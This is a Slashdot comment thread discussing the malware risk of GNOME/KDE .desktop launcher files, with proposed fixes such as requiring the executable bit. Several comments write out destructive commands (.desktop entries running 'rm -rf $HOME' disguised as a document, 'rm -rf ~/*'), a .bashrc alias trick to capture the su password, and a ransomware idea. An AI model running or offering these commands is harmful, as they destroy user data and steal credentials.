Malware Threat To GNOME and KDE 348
commandlinegamer writes "foobar posted on his blog recently about 'How to write a Linux virus in 5 easy steps,' detailing potential malware infection risks in the .desktop file format used by GNOME and KDE. This is not a new threat, and it appears to still be a risk, as discussions in 2006 did not seem to come to any firm conclusion on how to deal with the problem." There's a followup on LWN.
Solution (Score:5, Funny)
Re:Solution (Score:5, Insightful)
The answer is the same one that has been valid for .. well, since the advent of computers. There will always be vulnerabilities. The best you can do is be aware, vigilant, and choose software that has less vulnerabilities and whose writers work hardest to correct the problems fastest. Arguments can be made for or against Linux based on those criteria but it remains a very strong choice over Windows or Apple. The more popular Linux becomes on the desktop, the more chances there will be vulnerabilities. Now is the time for F/OSS coders to start working extra to ensure there are as few as possible.
If you write code, you know that you've left open areas where an exception will cause a problem for any number of reasons. it happens. period. So far, GNU/Linux has cleaned up quickly and well on most things. The struggle continues. That is the answer.
Re:Solution (Score:4, Informative)
Which in this case is unlikely to be GNOME or KDE, since this attack has been known for several years and absolutely nothing has been done about it (it's "expected behaviour").
Re: (Score:3, Informative)
I tried to make it a choice by the end user as to which is less vulnerable. MS products have/had similar issues by length and criticality. So if any and all of your choices can and will have such vulnerabilities, use other criteria for your choice.
On a side note: Worse than having a vulnerability in the code base for several months or years is having it left there intentionally, and marginally worse is when users ignore the patch when it is provided. With Linux patches are free. With Windows products you ne
Re:Solution (Score:5, Insightful)
With Linux patches are free.
And they are with Windows as well. Come on, it's more than a bit ridiculous to expect Microsoft to supply patches to people who pirate their software. If you've bought your copy of Windows, patches are free. There may be a bug with validating your copy, but that's also a mistake, not by design.
Re:Solution (Score:4, Insightful)
My poorly stated point is that those pirated copies are not being patched appropriately and thus represent a larger target for malicious software authors, making Windows a little bit less desirable from that point of view.
Re: (Score:3, Insightful)
Re:Solution (Score:4, Insightful)
Come on, it's more than a bit ridiculous to expect Microsoft to supply patches to people who pirate their software.
Remember that story about vaccinations the other day? Herd immunity is vitally important, and patching illegitimate installations makes the world safer for legitimate users. This in turn goes a way toward improving Microsoft's security reputation to something greater than Swiss cheese.
Re: (Score:3)
They won't listen (Score:5, Informative)
I filed a bug [freedesktop.org] warning of this security problem on March, 2005. Final answer of the developers after taking it to the freedesktop lists: WONTFIX. So, what's the point of reporting bugs?...
The fix is easy, only interpret .desktop files IFF they have the +x bit set (IOW, apply the regular UNIX semantics). It shouldn't take more than a few lines in Gnome and KDE to fix it, and distros can easily modify the scripts to make all the .desktop files +x-
Re: (Score:3, Insightful)
Well that's not actually a fix. If you're getting the file there by social engineering you can quite easily get the user to set permissions on the file to allow execution(you've already convinced them to download it haven't you).
If you've found a vulnerability allowing you to put the file there without user intervention, then you can easily change the permissions at the same time.
Re: (Score:3, Insightful)
The only solution to social engineering of the user is to have a more knowledgeable system administrator. This just ups the ante on the social engineering.
No system can defeat social engineering.
Re: (Score:3, Funny)
Well... file a God-bug [xkcd.com]. That should fix it!
Re:Solution (Score:4, Informative)
The vulnerability is in the way the desktop environment hides information from the user so you have no way (even if you are an experienced and responsible user) to avoid executing the malware. You get an attachment by mail, you just save it to look at it and see what it is (a one-click, and expected-safe operation) but when it appears on the desktop background, it's disguised as something else (the .desktop file can choose any icon and name it wants), and double-clicking to view the file in fact *executes* the code without asking you.
What should happen: you save the file; if you chose to save it to the desktop background it appears there, but because it's not marked executable it will not run when you double-click it. Instead the file contents open in a text editor, or some other fairly boring but safe action.
Re: (Score:3, Funny)
> see what it is (a one-click, and expected-safe operation)
You do *WHAT*?
> but when it appears on the desktop background
Wait, not only do you deliberately save random unidentified email attachments, you save them to the DESKTOP?
Whatever is wrong with you, it's no little thing.
> What should happen:
What should happen, when you get an email attachment and you do not know what it is, is that you either ignore it, or if you have a cer
Re:Solution (Score:5, Insightful)
Have a brain when using the PC.
It works for all operating systems. Viruses and Trojans require the user to not think and execute things willy-nilly. Having a brain reduces the infection vectors drastically.
Every "expert" I have met that has been infected was downloading and using warez unsafely. Every regular use I have met that was infected simply clicked yes to every dialog box they did not want to bother reading and understanding.
The OS does not matter, having educated and competent users does. Have to add that competent, I have seen educated users go and click on crap without reading or thinking.. It requires competence.
Re: (Score:3, Insightful)
Having a brain reduces the infection vectors drastically.
I forgot sarcasm tags when starting this thread, but there's also many other problems outside of "not having a brain." Unpatched flaws in your operating system, people still running IE6 and opening a JPEG with a script embedded, etc. One can be very intelligent at something completely unrelated to computers and still get infected purely because of a popup and an unpatched system.
Not everybody knows to run windows update or to update their Ubuntu installation even if it warns them, because it's usually being
Not PEBKAC (Score:5, Interesting)
A lot of people claim it's a PEBKAC problem, but I STRONGLY disagree.
If you expect people to figure out whether a file is safe before "launching/opening" it, then you are expecting people to solve something arguably harder than the "halting problem" (which I hear is very hard, but still easier in comparison since you are given both the description of the program AND the finite input!).
I propose that:
1) Compliant programs be allowed to _request_ what they want to be able to do (by either using a finite and manageable set of standard sandbox templates, or in special cases a custom sandbox template - which can be audited and digitally signed by 3rd parties).
AND THEN
2a) The user be asked whether the request seems reasonable e.g. Fun Screensaver requests "Standard Screen Saver" privileges vs WARNING!! Fun Screensaver is requesting "Full System" privileges!
AND THEN
3) If approved, the operating system then enforces the requested template, so the program can only do whatever possible within the template sandbox.
Do note there's also:
2b) The request is silently approved if the OS has been told to remember the user's prior approval of the program and template (and the alt/whatever key was not held down while launching).
2c) The request is silently approved if the program and requested template is signed by trusted parties (e.g. OS vendor), and the alt/whatever key was not held down while launching.
I have proposed this concept before to Ubuntu and Suse, see:
https://bugs.launchpad.net/ubuntu/+bug/156693 [launchpad.net]
(FWIW I've actually also suggested this to apple).
It'll be hard to implement, but I suspect it's easier than getting "Joe Sixpack" to reliably solve something harder than the "halting problem".
Lastly, much windows malware REQUIRE a brain to participate in order to spread. It's often harder to write malware that does not require a brain to spread. Many here think they're so smart, but would they really know what a devious binary or perl script actually does? Have they ever looked at the Underhanded C entries?
Re: (Score:3, Insightful)
Does it provide the user with an accurate concise idea of what the program's required privileges are?
Does it allow the user to save the decision preferences for an app+template pair?
Vista's UAC as implemented seems more like a way for Microsoft to shift blame to the user for security problems.
Re: (Score:3, Insightful)
Actually it's not what Vista does. Vista says "application X is either requesting system access, or appears as if it might request system access do you want to grant it".
It doesn't allow you to define which types of system access you want it to have(I might want my screensaver installer to be able to access the settings which allow it to set the screensaver I just installed as my default screensaver, but not to arbitrarily execute code or access other system settings for instance), nor does it allow you to
Re:Solution (Score:5, Insightful)
This has very little to do with user stupidity. Indeed, users should not execute things willy-nilly, but it's surely okay to open a file and look at its contents? If you think that is inherently unsafe then users must be prohibited from receiving email attachments (or downloading from web pages) altogether.
In this case there are no warning dialogues to click through, no unusual steps. All that happens is you save a file and then double-click to open it. There is no way to see in advance that the file is unsafe, and it can adopt any icon and name it wishes, so in the user interface it is *indistinguishable* from a legitimate desktop icon such as the trash can.
It gets a laugh on Slashdot to castigate 'stupid' users, but if the system does not provide users with the information needed to make an informed choice, then the system is at fault.
You are wrong (Score:5, Insightful)
I am dealing with a user at the moment who just isn't that bright. It is not that she is a moron, she just doesn't think. Somethings she does right, she gets her wallpapers through googles image search and uses firefox after my suggestion.
But she also wants animated cursors and finds them and happily installes them. Cursor Mania.
She just doesn't get, yet, that the internet has two kinds of free and that the more something shouts it is free the less likely it is. How do you explain that firefox is free and safe but cursormania is free and not safe?
The problem is not so much that some people are stupid but that they lack a healthy dose of cynasism, they forget to question things. And that is pretty to stupid.
The system can't protect against this unless you want to life in the nanny state. Women are free to go with convicted wife-beaters unless you want the state to decide your partner for you. People can install spyware unless you want the system to decide what you can install.
For some reason people like you want software to do things you would NEVER accept in hardware. Would you really want a powerdrill that constantly checked wether you where drilling in the factory approved substances, at the right angled, under the right conditions? A screwdriver that refuses to be used as a hammer?
At some point users must accept a responsibilty to operate their equipment responsible themselves and accept that if they make mistakes, they are the ones to blaim.
You know what my solution has been to fix 99% of friends requests to fix their windows PC? Re-install. Whipe the crap and sooner or later they either figure out that "mmm once I downloaded those free smiley's my computer starts to act like a piece of crap, maybe these two things are connected" or at least find someone else to help with their crap PC's.
Lets face it, after 30 years I have started to realise that no amount of suggestion is ever going to result in girls actually giving any of the sexual favors they seem to promise when they ask you to fix their laptop.
Re:You are wrong (Score:5, Insightful)
What you say is all true but it's not relevant to this particular problem, which is that *all* users, even sensible and cautious ones, can be easily tricked into running an executable because the user interface makes it look exactly like an ordinary file. You or I would also be vulnerable.
And BTW, I suggest you kiss her first, and fix the laptop afterwards.
Re:You are wrong (Score:4, Funny)
Lets face it, after 30 years I have started to realise that no amount of suggestion is ever going to result in girls actually giving any of the sexual favors they seem to promise when they ask you to fix their laptop.
It seems to me that while they are a bit slow with technology you, on the other hand, are a bit slow at making the (lack of) connection between "fixing laptop" and "getting laid" when social interaction is the issue.
Re: (Score:2)
But she also wants animated cursors and finds them and happily installes them. Cursor Mania.
She just doesn't get, yet, that the internet has two kinds of free and that the more something shouts it is free the less likely it is. How do you explain that firefox is free and safe but cursormania is free and not safe?
I had exactly one of these sort of people needing to borrow my (linux) computer the other day. A couple hours later I get back and on the desktop there's a couple extra files on my desktop like wallpapers.exe and the like. I really couldn't help but chuckle. I guess security through obscurity works for stupid users. :P
The problem is not so much that some people are stupid but that they lack a healthy dose of cynasism, they forget to question things. And that is pretty to stupid.
Eh. I've had enough of these cynic people. Such as "This software isn't free. I might not be into the whole computer scene, but trust me on this one, there's going to be a catch. The only thi
Re:You are wrong (Score:4, Insightful)
I think I would try that by explaining the difference between free as in freedom [gnu.org] and free as in "we will sell your soul to our advertisers" [google.com].
Re: (Score:2)
Re: (Score:2)
Finally, year of the openbsd desktop!
OpenBSD (Score:4, Funny)
Re: (Score:3, Funny)
Frost piss (Score:4, Interesting)
Interesting article. Cliff notes for those who don't read articles: KDE & Gnome desktop icons can contain malicious commands.
The common defense that "well at least linux malware can't get root privileges" isn't much of a defense. For many users, the most sensitive documents they have are owned by themselves.
Linux Users Don't Backup?!? (Score:2)
You mean Linux users, besides Linus (we all mirror his important files for him), should be backing up their files!?!
Oh the horror!
Re:Linux Users Don't Backup?!? (Score:4, Insightful)
Don't be so shortsighted. The issue isn't you losing your files. It is that others can obtain your files.
Just because malware doesn't have root privileges doesn't mean it isn't capable of stealing valuable information from you.
Re:Linux Users Don't Backup?!? (Score:4, Interesting)
Just because malware doesn't have root privileges doesn't mean it isn't capable of stealing valuable information from you.
I sometimes wonder how difficult it would be to obtain the root password from somebody. If the PATH variable has a path that the user has write access to, what's stopping the malware to put a "su" wrapper into that directory? Next time you enter su, the wrapper captures your password, logs you in and deletes itself.
I also think that a keylogger for X11 wouldn't be too difficult to implement.
Re: (Score:2)
If the PATH variable has a path that the user has write access to,
then the machine admin (or distro creator) is a moron.
Re: (Score:3, Informative)
On second thought, you don't even need that. The malware just has to do
echo "alias su=/tmp/evilwrapperscript" >> ~/.bashrc
and you're finished
Re: (Score:3, Informative)
True. Though just as the first case can be prevented by mounting /home (or possibly /home/) noexec, this once can be prevented by doing same with /tmp
Re: (Score:2)
The other issue is that your computer can be turned into one of those "zombies", just like the thousands of windows machines out there.
Desktop Linux is just as vulnerable as Windows. The security model is similar if not less secure - by default any program that > 90% of the Linux users out there run, can do whatever that user's account can do.
Given the same sort of users, the same sort of marketshare, there'd be tons of trojans, rootkits, zombies everywhere. If not more s
Re:Frost piss (Score:5, Insightful)
It does make a big difference in clean-up, though. With the malware not being able to get administrative privileges, it can't get into root's environment. That means that you can log in as root and the malware won't get a chance to take over, and then you can safely use all your scanning and clean-up tools without having the malware disable or circumvent them. Contrast this with how thoroughly rootkits can hide on Windows systems.
It's still dangerous, make no mistake. Once the malware's running locally, it can try local exploits to escalate to root access. But there's a lot fewer of those on Linux systems than on Windows, and they're a lot harder to exploit, and anything that doesn't successfully exploit them will be much easier to detect and remove. This is a significant win compared to Windows.
NB: nothing will protect a system from it's owner's stupidity. If the user insists on being willfully stupid, they're in a position to bypass any and all protections on the system. The only protection is to keep them away from the keyboard.
Re: (Score:2)
Why I'm still worried by a malware that, even without root privileges, runs
cd /
rm -rf *
Re: (Score:3, Insightful)
Really though, especially if we're talking about my personal desktop or laptop
Re: (Score:3, Informative)
I advocate the "Don't run as root." position for two reasons. One, it builds good habits from the start, both for users and for software vendors. It gets users used to running as ordinary users, and conditions them to expect the system to function correctly without administrative privileges except when explicitly doing administrative tasks. We've seen on Windows how many problems keep sticking around simply because of habits users have developed over the years. Inertia works, so put it to good use instead o
Re: (Score:2)
You have a very narrow view of the advantages of not running root. Let's say you get infected by a well written rootkit/stealthy trojan that quietly sends data from your computer to the crooks. Your keyboard is logged, email is scanned and who knows what else is transmitted. But since it didn't touch your downloads or music is no problem right? Not being root prevents most of dangerous malware from instantly hijacking your PC. It's far from being the silver bullet security solution but it's a must, unless y
Re: (Score:3, Interesting)
Escaping notice is the most important part of keeping malware on system. After it's found, the question is more about how painful it is to get off the system than whether it's going to get removed. Since modern malware authors want their software to stick around in the background for as long as possible, they just avoid doing anything outrageous and let the zombie send out a trickle of emails.
Experience with Windows users shows that the average end user who's willing to click on something like the author wa
Not really news... (Score:2)
The "Look! nude pictures of [latest chick seen on a hollywood blockbuster] ! If it doesn't open, save and execute" routine is pretty cross-platform. It relies on the Stupidity 0.99995b RC12 Gold API, and it is here to stay.
Re: (Score:3, Insightful)
The first problem is indeed that a desktop file does not require the executable bit to be executed (from Nautilus) by double-clicking it.
The second problem is that the file content specifies it icon, name and tooltip regardless of the filename of the desktop file.
For example, a very efficient way to fool people could be to disguise the desktop file into one of the default icons of the desktop (Trash, Computer, Home, ...)
For the virus writer the only problem is to get the desktop file to be saved in the Desk
Re: (Score:2)
I'd say it's not so much stupidity than human psychology, and that most people aren't educated to recognize these dangers. I'll refer you to what security and user interface designers refer to as the
Dancing Bunnies [msdn.com] problem.
The main workaround is to have users work in a sandbox. That way, if they blow something up, it's just their sandbox. The sandbox could be their home directory, or a virtual machine. Windows historically didn't sand
Re: (Score:3, Interesting)
The "Look! nude pictures of [latest chick seen on a hollywood blockbuster] ! If it doesn't open, save and execute" routine is pretty cross-platform. It relies on the Stupidity 0.99995b RC12 Gold API, and it is here to stay.
Which is wrong and has always been wrong by the way. And it's not "open, save, and double click" not "open, save and execute".
When someone double clicks an icon that signifies it's an image file, that action should not execute an arbitrary command on your system. There needs to be some sort of guarentee that the icon chosen to represent a file actually represents the file. There is no guarentee with .desktop files. This is a bug damn it, not a feature!
And you have a strange definition of "stupidity" whi
Virus? (Score:5, Insightful)
It relies on the user downloading saving and running a shell-script. The only trick here is that in this KDE/GNOME form the user does not need explicitly to add execution rights on the file.
Still hardly a virus, more like a gun without a safety switch. It is one step easier for someone to shoot themselves this way.
Interestingly if we wish to reinforce the 'chmod +x' scheme, desktop files should need a +x (or some other non-MIME property) to be treated specially by GNOME and KDE. Might be an idea.
Re: (Score:2)
It depends on the user clicking to 'save attachment'. The attachment is not in fact a shell script but a .desktop file. If it goes to the desktop background (as is often the default when saving files) then it can choose any icon it wishes, disguising itself as a plain text file or a JPEG image or even another copy of the 'Computer' icon that launches the file browser.
Re: (Score:2)
The only trick here is that in this KDE/GNOME form the user does not need explicitly to add execution rights on the file.
Not quite; this "shell script" (desktop file) also has the ability to arbitrarily override its displayed icon and label. One possible scenario:
Requiring the executable bit for .desktop laun
Re: (Score:2)
Re: (Score:3, Insightful)
I care more about user data.
I can get "install" data from the DVD/CD and Distro update service.
But I cannot always retrieve the most recent user data from backups.
Losing a day's work or even an hour's work can be more pain than having to reinstall the OS.
Of course it's different if you are one of those users that installs an operating system just for the purpose of playing with themes, etc but not doing any significa
Great news (Score:5, Funny)
So we have a long-known, unaddressed vulnerability and easily accessible instructions on writing a Linux virus.
Does this mean Linux is finally "ready for the desktop"?
Re:Great news (Score:5, Funny)
No, it means malware is finally ready for the .desktop
Re: (Score:3, Insightful)
I get your humor, but this may be the only way for Linux to claim the "year of Linux on the desktop".
I mean bug-to-bug, bullshit-to-bullshit compliance to MS Windows. People are fed crap to grow up and they asks for more crap. At least this is what I think I got from GNOME.
I use to have a sig. saying "so this is how Linux dies -- with thunderous applause." I changed it after being protested by someone as AC (and partly in fear of being sued by LucasFilm ;) I've always feared that the year of Linux on the de
Re: (Score:2)
I have a test case running right now. A 60-odd year old gentleman, with close to zero computer experience, was given a 3 or 4 year old PC and wanted to use it. Win2000 was installed and password protected. I wiped the disk, installed Ubuntu and gave the machine back without saying too much about MS, Linux or what-have-you. It'll be interesting to see how he makes out.
I will say that the Ubuntu install was totally painless - it recognized and correctly configued all the hardware without an internet conne
Re: (Score:3, Funny)
You really shouldn't call your dad a "test case."
Today's file managers are going wild... (Score:2, Insightful)
Everyone is trying to mimic the brain-dead M$ Way.
Just think of the idea. You click on the icon (who knows what the picture would suggest) and the file path is passed to an "interpreter" (be it oowriter, emacs or python or ld.so) you may not know. This is a terrible idea to begin with.
That's why I use file managers almost only for bulk copying / moving. And I still prefer the CLI if the file names are regular-ish enough.
Re: (Score:2)
Re: (Score:2)
Well, independently of whether you could code it or not: what design choices would you make which are so different from what there currently exists? If you think it is bad that the existing file managers are so similar it probably means youhave considered ways in which they could be different...
It not like the design space for file managers is that huge, you know...
.
Lame (Score:3, Insightful)
I have previews turned on in Gnome so I can actually see the picture before I run the code.
Re: (Score:2)
The whole scheme hinges on the user being an idiot in terms of what they open in their email - seems to me there's little in the way of guarding against such 'vulnerabilities'...build a more idiot-proof system and the world will build a bigger idiot.
from the article (Score:2)
Type=Application
Name=some_text.odt
Exec=rm -rf $HOME
Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png
Oops... you had backups of all your data, didn't you?
The article has an example of an entry that downloads code off a server and executes it instead.
Fast fix (Score:5, Interesting)
Fast, simple fix for this: make .desktop files scripts. Start them with "#!/usr/bin/false" or something so that if just executed from the command line they don't do anything, just fail. Gnome and KDE expect all entries to start with that and be executable. If they're executable, they act normally. If they aren't executable, the contents or their properties are displayed instead. If they don't start with the hash-bang line, the interface prompts the user for whether they want to display or execute the entry.
A fancy elaboration could register a binary-format handler (similar to the one Wine registers) that would recognize the "[Desktop Entry]" starting the file as a binary format and, if the file was executable, trigger the interface to act on the entry. That could remove the need for the hash-bang first line, but there's some other potential holes I'd have to analyze for impact.
Re:Fast fix (Score:5, Interesting)
Why not just make a proper interpreter for .desktop files, and use that in the first line ("#!/usr/bin/desktop-launcher")? Then the DEs could always run executable files, and always display non-executable files. As a bonus, you could run launchers from the command-line.
Re: (Score:2)
Because you want them to be do-nothing files when you aren't running in a DE (eg. logging in from a text-mode console or via SSH). Or at least that's MHO.
Not a virus? (Score:5, Insightful)
When I think of a "virus", well, that's just malicious code, it's something designed to do some form of damage. It's malware-- software that's up to no good. That doesn't describe the delivery method.
I can see how folks want to draw a distinction based on the severity of the exploit (namely the extent of the potential damage to the system and the level of user interaction), but claiming this isn't a real virus is just silly. Maybe a new definition for the more severe sorts of malware is needed.
Re: (Score:2)
Then they likely aren't viruses, but other things such as worms.
This wouldn't be that hard to fix... (Score:2)
1. Create some way to register
2. White list all
Securety of OS files vs personal files (Score:2)
Re: (Score:2)
In non-root mode, ANY program can access my personal files, email them, upload them, delete them, mutilate them, etc...
Not true. Only programs run as your user can access your personal files, assuming you have sane permissions set.
But if the repositories would be hacked, then even that source isn't safe!
That's what package signatures are for.
Dumb question related to OS X (Score:2)
Could the respective desktops be set up to prompt the user before a .desktop entry is opened for the first time, a la OS X's behavior when launching apps?
Re: (Score:2)
I realize that you are only 19 years old and new to this Internet thing. Posting link spam like you have been doing is considered bad etiquette.
Please stop, we do not like it here.
Re: (Score:2)
I guess my hopes of starting a new meme have been dashed...alas.
I think I speak for us all when I say that there's enough memes and we don't need you trolling /. trying to make a new trend while plugging a blog.
Re: (Score:3, Funny)
Nah, you don't speak for me.
Re:Protect your self with encryption (Score:5, Informative)
Why do shortcuts need to have the ability to run code?
The shortcut only contains parameters for the path to the application and a list of parameters; it doesn't run any code itself. The problem is that the application can be (e.g.) /usr/bin/perl, and the parameters "-e 'perl code here'". Removing this ability would seriously impact the usefulness of the shortcuts.
The real issue is that the DEs are blindly trusting a non-executable file of unknown source to provide this information. The solution has already been suggested: turn all .desktop files into scripts (via a #! line, which is already valid comment syntax), mark them as executable, and have the DE run them like any other executable file. Non-executable .desktop files which link to applications would be displayed as usual, but would be treated as documents rather than launchers.
Re: (Score:2)
Re: (Score:3, Insightful)
That would require a blacklist of script interpreters, which could only be a temporary solution. No blacklist is ever going to cover all possible attack vectors. Similarly, checking for particular parameter length will either have too many false positives or fail to catch potential attacks. E.g., what if the command was /bin/rm and the parameters were "-rf /"?
Requiring the executable bit would make for a more permanent solution to the problem.
Re: (Score:2)
Re:Protect your self with encryption (Score:5, Informative)
Yeah it's pretty straightforward: if the executable bit is not set then the file is merely *displayed* as a plain text file. If the executable bit is set then it is *run*.
That means you cannot simply save an attachment from a message and run it. You can however display it, which is fine.
Everything works like this except for .desktop files, which because of an oversight, default to *running* on double-click even if not marked executable. Hence the attack vector. It is made nastier by the fact that .desktop files can disguise themselves with a name and icon of their choosing.
Re: (Score:2)
Re: (Score:3, Interesting)
The programs responsible for creating .desktop files would set the execute bit automatically, so the change should be more or less invisible. The only case where you'd have a non-executable .desktop file would be if it was saved from a program which does not normally create shortcuts: an e-mail attachment, something downloaded from a web site, etc.
Re:Does not work as advertised (Score:4, Insightful)
Did you even RTFA? (Score:5, Informative)
He is not talking about shell scripts at all. The whole point of the article is a .desktop file does not need to be +x to execute it, KDE and Gnome execute commands in it automatically regardless. So all they have to do is save it and click on it.
Re:Did you even RTFA? (Score:5, Insightful)
Re:Did you even RTFA? (Score:5, Funny)
You are right and I am wrong.
W...w...wh....what the fuck just happened?! Am I on the internet still?
Re: (Score:2)
Is there a "reason" for that? I mean a real technical reason of course. What would be the damage if the DE obeyed the +x bit for these?
Re:Stay away from root (Score:5, Insightful)
Re: (Score:2)
Which you have backed up, RIGHT?
Re: (Score:2, Insightful)
Re: (Score:2)
You can lose your data by
A bad drive
Accident (Delete, whoops... )
Your system becoming unusable
Malware deleting files
This is what backups are for .... if your system is still running and free from malware (now) you can just restore the backup, in a few moments
If the malware runs as root then it's a case of reinstall from the ground up then restore all of the the backup ...(Windows default)
Re: (Score:2)
And moral of the story is:
Only use root when you have to, and never, EVER log into a desktop as root. If you do this, and there's no problem in doing it in Linux, the vulnerability can't hack your box, it can only hack your account.
The loss can only be to your data, which is typically unique and valuable, as opposed to your operating system, which is easily replaced, you mean?
Wow, that's just great. Can we have an OS with proper sandboxing already? Anything you run in its own container, unable to escape? So you really _can_ run programs from the internet, without any fear of the consequences?
Re: (Score:2)
We linux gamers already do exactly that.
Gnome, KDE, and other environments take up too much resources, so we start a Xterm. Then we proceed to launch the game via Wine.
Games run smoother in Linux via Wine than they do on the same hardware with Windows.
Wow, please mod this to -1 (Score:4, Funny)
Sorry, wrong thread, too many tabs.
Re: (Score:2)
Why would the judge get kickbacks for jailing juveniles (or others)?
Maybe the judge knew that they were all writing Linux viruses.
Maybe I just haven't had enough coffee...
Obviously. You posted to the wrong story. With any luck someone else will also be caffeine deprived and will mod you as Insightful anyway.
Re: (Score:2)
paste the above four lines in to a text file named screensaver.desktop and execute it while in gnome or KDE, DANGER this is can delete everything in your
Re: (Score:2)
I like the idea of ransomware.
'Pretty game runs'. While playing, it downloads say 10 pubkeys from GPG server. Then proceeds to encrypt ~ to those 10 keys whilst overwriting every file there.
Now, game shows nasty message: Your shit has been encrypted. Pay X or fcuk off.
Re: (Score:2)
[Desktop Entry]
Type=Application
Name=Cool_Screensaver
Exec=rm -r ~/*
fixed it, DO NOT DO THIS!
Re: (Score:2)